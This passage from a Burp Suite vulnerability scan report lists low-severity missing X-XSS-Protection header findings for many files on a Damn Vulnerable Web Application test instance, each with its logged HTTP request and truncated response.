Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=33b54a2ee3adcc13612ba6943ddba842
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php?doc=PDF
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:43 GMT
Content-Type: application/pdf
Content-Length: 422011
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "6707b-60aa7c44ae30b"
Accept-Ranges: bytes
%PDF-1.3
%...........
4 0 obj
<< /Length 5 0 R /Filter /FlateDecode >>
stream
x..V.n.0...+.(.,......-.^.6FrhzHT.qa....;......f....H.N....qFO...H..4..B.fN..@..VQ.%E...|q.1..o.....v%6K.T9;.Tk..Me]S...S.
...[SNIP]...
16.15. https://pentest-ground.com:4280/docs/graphics/docker/detail.png
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/docs/graphics/docker/detail.png |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /docs/graphics/docker/detail.png HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=71714f1a9cde023a53997f100bf78363
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:18 GMT
Content-Type: image/png
Content-Length: 164347
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "281fb-60aa7c44ae30b"
Accept-Ranges: bytes
.PNG
.
...IHDR................H... pHYs.................IDATx...y\T.................%j.X.f.K..ijV.Z..nz3.j....V..-j..V.Z.en.... n...&0..c.a..a..A}......s..9...y..(....h.j..99.d.....CNN6j...F.F...4.
...[SNIP]...
16.16. https://pentest-ground.com:4280/docs/graphics/docker/overview.png
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/docs/graphics/docker/overview.png |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /docs/graphics/docker/overview.png HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=71714f1a9cde023a53997f100bf78363
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:18 GMT
Content-Type: image/png
Content-Length: 73209
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "11df9-60aa7c44ae30b"
Accept-Ranges: bytes
.PNG
.
...IHDR................H... pHYs.................IDATx...y\T.......&. .(....
..Z
j........K.....%.R*.&e.Vje.e..{.......,...l.9,.?f....6qy....s.=..g...9..9.... _..CCC...aT..FF.000.........=..
...[SNIP]...
16.17. https://pentest-ground.com:4280/dvwa/css/help.css
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/css/help.css |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /dvwa/css/help.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/css,*/*;q=0.1
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e3e80b2e1e73cd41e7284684082f1165
Referer: https://pentest-ground.com:4280/vulnerabilities/view_help.php?id=brute&security=low&locale=en
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:12 GMT
Content-Type: text/css
Content-Length: 304
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "130-60aa7c44ae30b-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
body {
background-color: #e7e7e7;
font-family: Arial, Helvetica, sans-serif;
font-size: 13px;
}
h1 {
font-size: 25px;
}
div#container {
}
div#code {
background-color: #ffffff;
}
...[SNIP]...
16.18. https://pentest-ground.com:4280/dvwa/css/login.css
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/css/login.css |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /dvwa/css/login.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/css,*/*;q=0.1
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d018a445946d614889512423e2b94708
Referer: https://pentest-ground.com:4280/login.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:38 GMT
Content-Type: text/css
Content-Length: 842
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "34a-60aa7c44ae30b-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
body {
background: #fefffe;
font: 12px/15px Arial, Helvetica, sans-serif;
line-height: 20px;
color: #6b6b6b;
}
#wrapper {
text-align: center;
margin: 0 auto;
}
#content {
display
...[SNIP]...
16.19. https://pentest-ground.com:4280/dvwa/css/main.css
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/css/main.css |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/css,*/*;q=0.1
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=68b03ae0039a78fdaed2f3a1fec06032
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/?default=German
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:15 GMT
Content-Type: text/css
Content-Length: 4026
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "fba-60aa7c44ae30b-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
body {
margin: 0;
color: #2f2f2f;
font: 12px/15px Arial, Helvetica, sans-serif;
min-width: 981px;
height: 100%;
position: relative;
}
body.home {
background: #e7e7e7;
}
div.clear
...[SNIP]...
16.20. https://pentest-ground.com:4280/dvwa/css/source.css
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/css/source.css |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /dvwa/css/source.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/css,*/*;q=0.1
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=0469bf99ed333ec9d4bed463704811d5
Referer: https://pentest-ground.com:4280/vulnerabilities/view_source.php?id=brute&security=low
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:07 GMT
Content-Type: text/css
Content-Length: 319
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "13f-60aa7c44ae30b-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
body {
background-color: #e7e7e7;
font-family: Arial, Helvetica, sans-serif;
font-size: 13px;
}
h1 {
font-size: 25px;
}
div#container {
}
div#code {
background-color: #ffffff;
}
...[SNIP]...
16.21. https://pentest-ground.com:4280/dvwa/images/lock.png
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/images/lock.png |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /dvwa/images/lock.png HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=cc1aefef1476eee2f6c22b6683bf0c38; security=impossible
Referer: https://pentest-ground.com:4280/security.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:35 GMT
Content-Type: image/png
Content-Length: 761
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "2f9-60aa7c44ae30b"
Accept-Ranges: bytes
.PNG
.
...IHDR...............o.....IDATx.....kg.......A..m..l.....|....pm.6OO..........E...[W...4.M..}...P!........bf._......6...D...}PNgGK?P3;;3....X\..Nc....................AM..o.W...?.w.zvff...
...[SNIP]...
16.22. https://pentest-ground.com:4280/dvwa/images/login_logo.png
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/images/login_logo.png |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /dvwa/images/login_logo.png HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d018a445946d614889512423e2b94708
Referer: https://pentest-ground.com:4280/login.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:38 GMT
Content-Type: image/png
Content-Length: 9088
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "2380-60aa7c44ae30b"
Accept-Ranges: bytes
.PNG
.
...IHDR.......r...... ....#GIDATx....pd.....;...m..m..m...z<wl..d....._w.}........U......Z..*U....(.f...8..8..1.....W....$.D.D.f.._(J.H.J..u8.'.@r
=.0$..(...\.....<......X.m.. ..pX.DQ....`;
...[SNIP]...
16.23. https://pentest-ground.com:4280/dvwa/images/logo.png
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/images/logo.png |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /dvwa/images/logo.png HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=68b03ae0039a78fdaed2f3a1fec06032
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/?default=German
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:15 GMT
Content-Type: image/png
Content-Length: 5044
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "13b4-60aa7c44ae30b"
Accept-Ranges: bytes
.PNG
.
...IHDR...i...<.....e..~...{IDATx......h....l..m...*.:.gMp.m...6f....[....d..k.....3..er....8.I..u..Z ..B.
..r..V.."../fEl...7.....m.
.XZ.q.V_..b>.O[....-WWlWKu\5....'.f.>....|v...t....m..KY
...[SNIP]...
16.24. https://pentest-ground.com:4280/dvwa/images/spanner.png
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/images/spanner.png |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /dvwa/images/spanner.png HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=823c02c4926209a190f21de98c4aef51
Referer: https://pentest-ground.com:4280/setup.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:20 GMT
Content-Type: image/png
Content-Length: 464
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "1d0-60aa7c44ae30b"
Accept-Ranges: bytes
.PNG
.
...IHDR..............A......IDATx...5.SQ.....:\...C.}.p:...<.uo..}.uw.eqw'>...m..s.x...w2.\Dt.f..=~....j].!Sn...|...L. g.....2?.r.(55..<aPQ.../^......FRU..^a._.JJJ...d...G..<7..;.l......i...
...[SNIP]...
16.25. https://pentest-ground.com:4280/dvwa/js/add_event_listeners.js
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/js/add_event_listeners.js |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /dvwa/js/add_event_listeners.js HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=68b03ae0039a78fdaed2f3a1fec06032
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/?default=German
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:15 GMT
Content-Type: text/javascript
Content-Length: 593
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "251-60aa7c44ae30b-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
// These functions need to be called after the content they reference
// has been added to the page otherwise they will fail.
function addEventListeners() {
var source_button = document.getElementBy
...[SNIP]...
16.26. https://pentest-ground.com:4280/dvwa/js/dvwaPage.js
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/dvwa/js/dvwaPage.js |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /dvwa/js/dvwaPage.js HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=68b03ae0039a78fdaed2f3a1fec06032
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/?default=German
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:15 GMT
Content-Type: text/javascript
Content-Length: 1030
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "406-60aa7c44ae30b-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
/* Help popup */
function popUp(URL) {
day = new Date();
id = day.getTime();
window.open(URL, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=800,heig
...[SNIP]...
16.27. https://pentest-ground.com:4280/hackable/uploads/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/hackable/uploads/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /hackable/uploads/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=c89a7d1e75ef5e86c9d7f0c35ff5c80c
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 403 Forbidden
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:59 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Ap
...[SNIP]...
16.28. https://pentest-ground.com:4280/instructions.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/instructions.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /instructions.php?doc=PDF HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=c75ac127e20686129d48c0244418acaf
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:42 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3169
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Instructions :: Damn Vulnerable Web Application (DVWA)</title>
<link
...[SNIP]...
16.29. https://pentest-ground.com:4280/login.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/login.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /login.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d018a445946d614889512423e2b94708
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:38 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 1441
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Login :: Damn Vulnerable Web Application (DVWA)</title>
<l
...[SNIP]...
16.30. https://pentest-ground.com:4280/logout.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/logout.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /logout.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d018a445946d614889512423e2b94708
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: login.php
16.31. https://pentest-ground.com:4280/phpinfo.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/phpinfo.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
No X-XSS-Protection header was set in the response. This means that the browser uses default behavior that detection of a cross-site scripting attack never prevents rendering.
Remediation detail
The following header should be set:
X-XSS-Protection: 1; mode=block
Request 1
GET /phpinfo.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e00e28236ae59386587b3d8a65c24511
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
